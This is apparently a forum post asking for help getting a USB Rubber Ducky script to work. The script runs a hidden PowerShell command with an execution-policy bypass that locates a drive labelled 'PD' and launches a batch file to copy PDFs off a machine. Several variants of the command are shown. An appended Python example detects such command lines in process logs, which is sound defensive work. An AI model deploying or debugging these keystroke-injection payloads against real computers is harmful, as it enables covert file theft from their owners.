grahamjohnson77

  1. This works directly from PS CLI:

         STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

     but not when run from ducky.
  2. BTW, all of the REMs are my attempts to try all different ways to get one to work. I have been online checking for suggestions too!
  3. All, I have started to learn the rubber ducky and followed the vblog on exfiltration of files from a system using the ducky. I built everything and all components are working except the initial drive find in PowerShell.

     Learning from vblog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!)

     For testing only (while I get more experience of the ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files for d.bat, e.bat and the cscript i.vbs. Files are copied to slurp folder here. Then I plug in my rubber ducky to start the attack. That ducky script looks for the drive with Label "PD" (which is F:\) for the required d.bat to start the attack.

     Using my testing/debugging, I know that if I run the powershell cmd directly in a powershell CLI, the attack works no issues. Then, I can hard code the drive letter of F:\ and again, no issues. My slurp has the extracted pdf files.

     The only thing I can think it could be is the System is Locale Italian with Italian keyboard. But I am compiling it with ITALIAN encoder and works for other ways.

         REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd"
         REM This one is working directly from Run -> Start!!!
         REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd"
         REM This one is working directly from Run -> Start!!! But Not Ducky!
         REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd"
         REM This one is working but I don't want to hard code it obviously! Just to try and confirm is working as expected!
         REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd"
         REM My latest attempt! Still no luck!
         STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"
         ENTER

     I did see some errors about the select from win32_volume not valid etc. last night during troubleshooting so I think I would be seeing some PowerShell error if the string format was incorrect etc.

     Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when Ducky is running? (again, I can put it into PowerShell directly and works!)

         STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

     Thank you.
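
Seen from the defender's side, the command line quoted in the post above has a recognisable shape in process-creation logs: a hidden window, an execution-policy bypass, and a `Win32_Volume` lookup by label. The following is an added example, not part of the original post; the hostnames and the two benign command lines are constructed, and the alert rule is one assumed way to combine the indicators.

```python
import re

# "-Name value" pairs. powershell.exe accepts abbreviated parameter names,
# so names are compared as prefixes (-W = -WindowStyle, -Exec = -ExecutionPolicy).
PARAM_RE = re.compile(r"(?<!\S)-([A-Za-z]+)\s+([A-Za-z]+)")
# A Win32_Volume query that mentions Label (via -Filter or Where-Object).
VOLUME_RE = re.compile(r"win32_volume.*\blabel\b", re.IGNORECASE | re.DOTALL)

def indicators(cmdline):
    """Return the indicator names present in one process command line."""
    found = set()
    if not re.search(r"\bpowershell(\.exe)?\b", cmdline, re.IGNORECASE):
        return found
    for name, value in PARAM_RE.findall(cmdline):
        name, value = name.lower(), value.lower()
        # Value prefixes are matched too because the post also uses "-W H".
        if "windowstyle".startswith(name) and "hidden".startswith(value):
            found.add("hidden_window")
        is_policy = name == "ep" or (
            name.startswith("ex") and "executionpolicy".startswith(name))
        if is_policy and value == "bypass":
            found.add("exec_bypass")
    if VOLUME_RE.search(cmdline):
        found.add("volume_label_lookup")
    return found

def is_alert(cmdline):
    """Assumed rule: volume-by-label lookup combined with hiding or bypass."""
    found = indicators(cmdline)
    return "volume_label_lookup" in found and bool(
        found & {"hidden_window", "exec_bypass"})

# Constructed process-creation records (hostnames are made up). The first
# command line is the one quoted in the post; the other two are benign samples.
SAMPLE_EVENTS = [
    ("WS-017", r'''powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"'''),
    ("WS-022", r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ("WS-031", r'powershell -W Normal -Command "Get-WmiObject Win32_Volume | Select-Object Label, Name"'),
]

def alerts(events):
    """Return the hosts whose command line triggers the alert rule."""
    return [host for host, cmdline in events if is_alert(cmdline)]

if __name__ == "__main__":
    for host, cmdline in SAMPLE_EVENTS:
        print(host, sorted(indicators(cmdline)), "ALERT" if is_alert(cmdline) else "ok")
```

Each indicator alone is common in legitimate administration, which is why the rule only alerts on the combination; the input is whatever command-line field the process-creation log source provides.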